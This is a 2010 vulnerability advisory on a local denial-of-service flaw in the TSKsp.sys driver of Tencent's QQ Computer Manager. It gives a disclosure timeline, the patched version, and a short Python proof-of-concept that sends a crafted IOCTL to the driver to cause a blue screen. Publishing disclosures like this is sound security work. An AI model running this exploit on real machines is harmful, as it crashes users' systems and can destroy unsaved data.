QQ Computer Manager TSKsp.sys Driver Local Denial of Service Vulnerability
By Lufeng Li of Neusoft Corporation
Vulnerable: QQpcmgr<=v4.0Beta1
Vendor: Tencent Inc
1) Software Description:
QQ doctors more than three years after the development and operation, and finally ushered in the fourth
generation - QQ Computer Manager 4.0 . QQ butler 4.0 version of
the computer not only doctors and QQ QQ integrated software management, and increased cloud killing
horses, clean up the core function of plug-ins; addition,QQ computer
butler innovative features introduced software to move, you can easily solve the insufficient disk space
C problem.
2) Details:
A local denial of service vulnerability in QQ Computer Manager that handling ioctl request. A successful
attack can lead to BSoD.
3) Timeline:
2010.07.01 Vendor notified
2010.07.22 Vendor released new fixed versions
2010.08.09 Advisory released
4) Solution:
Update to version QQPCMgr_40_278.
5) Exploit:
#!/usr/bin/python
#################################################################
#################################################################
from ctypes import *
kernel32 = windll.kernel32
Psapi = windll.Psapi
if name == 'main':
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2
DEVICE_NAME = "\\\\.\\tsksp"
dwReturn = c_ulong()
out_data = ''
in_data = ''
driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
0, None, CREATE_ALWAYS, 0, None)
dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x22e01c, in_data,0, out_data,
0,byref(dwReturn), None)